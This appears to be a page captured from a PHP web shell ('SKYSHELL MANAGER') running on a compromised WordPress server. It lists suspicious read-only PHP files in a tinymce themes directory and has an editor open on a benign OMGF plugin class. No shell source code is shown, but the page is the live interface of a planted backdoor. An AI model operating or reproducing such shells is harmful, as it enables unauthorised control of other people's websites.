📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: Divi.php
<?php /* * * * * * * * * * * * * * * * * * * * * * * ██████╗ ███╗ ███╗ ██████╗ ███████╗ * ██╔═══██╗████╗ ████║██╔════╝ ██╔════╝ * ██║ ██║██╔████╔██║██║ ███╗█████╗ * ██║ ██║██║╚██╔╝██║██║ ██║██╔══╝ * ╚██████╔╝██║ ╚═╝ ██║╚██████╔╝██║ * ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ * * @package : OMGF * @author : Daan van den Bergh * @copyright: © 2017 - 2025 Daan van den Bergh * @url : https://daan.dev * * * * * * * * * * * * * * * * * * * */ namespace OMGF\Frontend\Compatibility; use OMGF\Admin\Settings; use OMGF\Helper as OMGF; /** * @codeCoverageIgnore Because it depends on a 3rd party plugin. */ class Divi { /** * Build class. */ public function __construct() { $this->init(); } /** * Action/filter hooks. * * @return void */ private function init() { add_filter( 'omgf_frontend_process_fonts_set', [ $this, 'maybe_modify_id' ], 10, 2 ); } /** * Compatibility fix for Divi Builder * * @since v5.1.3 Because Divi Builder uses the same handle for Google Fonts on each page, * even when these contain Google Fonts, let's append a (kind of) unique * identifier to the string, to make sure we can make a difference between * different Google Fonts configurations. * @since v5.2.0 Allow Divi/Elementor compatibility fixes to be disabled, for those who have too * many different Google Fonts stylesheets configured throughout their pages and * blame OMGF for the fact that it detects all those different stylesheets. :-/ */ public function maybe_modify_id( $id, $href ) { if ( OMGF::get_option( Settings::OMGF_ADV_SETTING_COMPATIBILITY ) && str_contains( $id, 'et-builder-googlefonts' ) ) { $href_attr = is_array( $href ) && isset( $href[ 'href' ] ) ? $href[ 'href' ] : ''; return $id . '-' . strlen( $href_attr ); // @codeCoverageIgnore } return $id; } }
Save